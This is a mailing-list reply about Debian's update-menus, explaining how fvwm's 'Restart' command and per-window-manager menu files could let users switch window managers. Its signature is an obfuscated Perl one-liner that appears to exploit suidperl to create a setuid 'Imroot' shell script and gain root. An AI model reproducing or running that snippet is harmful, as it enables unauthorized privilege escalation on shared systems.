Re: general update-menus for debian

> Yes, I absolutely agree that the goal you mentioned would be good
>
> It's just that the way it's reached seems to be somewhat complicated
> (though I certainly don't see a simpler way).

Well, /etc/X11/Xservers already exists, and has all the window managers
listed in it. I can easily write a script that fvwm calls that makes it
generate a menu of other available window managers. But I'd prefer it were
all done in the menu program, as that way seems cleaner to me.

> The only way I can see how your suggestion would help is:
> for wm to create a file in /usr/lib/menu/wm.fvwm2:
>
>    fvwm2module Modules/wm fvwm2/startwm none "Wm" Kill current Session; wm
>
> (I'm assuming that, for fvwm2 to be able to switch to wm, it would
> need to execute a fvwm2 command (kill current session), and then
> normally start wm).

No, I don't think that's correct. Fvwm has a "Restart" command. Something
like "Restart afterstep" does the trick nicely.

Afterstep would create a /usr/lib/menu/afterstap that looks something
like:

wm WindowManagers afterstep/startwm none "Afterstep" /usr/X11R6/bin/afterstep
fvwmmodule Modules afterstep/wharf none "Wharf" /usr/X11R6/lib/X11/afterstep/Wharf

There would be a /etc/X11/fvwm2/fvwm2wmwrap file that contains "Restart ",
and the /etc/menu-methods/fvwm would need to recongnize the "wm" tag and
use fvwm2wmwrap to generate the menu entry. I think this can be added to
the fvwm stuff you already have done a minimim of fuss. The modules would
be handled similarly.

--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod            jeh22@cornell.edu
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_